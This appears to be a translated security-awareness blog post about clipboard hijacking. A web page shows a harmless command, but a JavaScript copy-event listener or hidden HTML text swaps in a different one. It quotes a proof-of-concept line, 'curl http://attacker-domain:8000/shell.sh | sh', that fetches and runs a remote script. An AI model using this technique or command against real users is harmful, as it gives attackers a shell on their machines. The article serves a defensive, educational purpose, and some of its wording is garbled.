It turns out that programmers, system administrators, security researchers, and technical people are at risk of having their systems compromised when they copy and paste commands from a web page into a console or terminal.
Here’s why you shouldn’t copy-paste commands directly into the terminal.
Just ask any developer or administrator if they have ever copied a command line or code snippet from the web.
The answer is probably “yes”. Do you think that what you copy is just pasted? But it doesn’t.
Backdoor is automatically inserted into the clipboard
Recently, Gabriel Friedlander , founder of Wizer, a security awareness training platform, warned us to be careful when copying and pasting commands from web pages, and demonstrated an obvious and He demonstrated a surprising hack.
Whether you are a beginner or an expert, it is not uncommon to copy frequently used commands from a web page (StackOverflow) and paste them into an application, Windows command prompt, or Linux terminal.
However, Friedlander warns that web pages may secretly replace the contents of the clipboard, so that what is actually copied to the clipboard is very different from what was intended to be copied.
<!
Also, if the necessary care is not taken, the developer may realize his mistake after pasting the text, and by that time it will be too late.
In a simple proof of concept (PoC) published on his blog, Friedlander asks readers to copy a simple command that many system administrators and developers will be familiar with.
PoC commands to be copy-pasted
Friedlander’s HTML page has a simple command that can be copied to the clipboard.
sudo apt update
If you paste a copy of “sudo apt update” from Friedlander’s blog into a text box or Notepad, the result will show the following string
curl http://attacker-domain:8000/shell.sh | sh
Not only does the clipboard show a completely different command, but there is also a newline (or return) character at the end of the command.
In other words, the above example will be executed as soon as you paste it directly into a Linux terminal.
People who pasted this text might have mistaken it for a copy of the familiar command “sudo apt update”, which is used to get updates for software installed on the system.
But that wasn’t really the case.
What causes it?
It’s in the JavaScript code hidden in the PoC HTML page set up by Friedlander.
As soon as you copy the text “sudo apt update” contained in an HTML element, the JavaScript “event listener” catches the copy event and replaces the clipboard data with malicious executable code.
Although event listeners have a variety of correct uses in JavaScript, this is an example of a malicious use.
Mr. Friedlander said
This is why you should never copy-paste commands directly into the terminal
You think you’re copying one thing, but it gets replaced by something else, like malicious code. Just by injecting a single line of code into the copied code, it is possible to create a backdoor into the application.
This attack is very simple, but also very effective.
One Reddit user also presents an alternative example of this trick that doesn’t require JavaScript, where invisible text created with HTML and CSS styling is copied to the clipboard when the visible portion of the text is copied.
Hidden HTML (right) is copied during copy-paste and contains unexpected lines (left)
https://jsfiddle.net/rkqg9bf6/ (test site)
The problem is not only that websites can use JavaScript to change the contents of the clipboard
It is invisible to the human eye, but it is copied by the computer! You may just be hiding commands in your HTML.
This is another reason why you shouldn’t blindly trust anything you copy from a web page and paste it into a text editor first.
Simple, but an important security lesson to implement.
Comments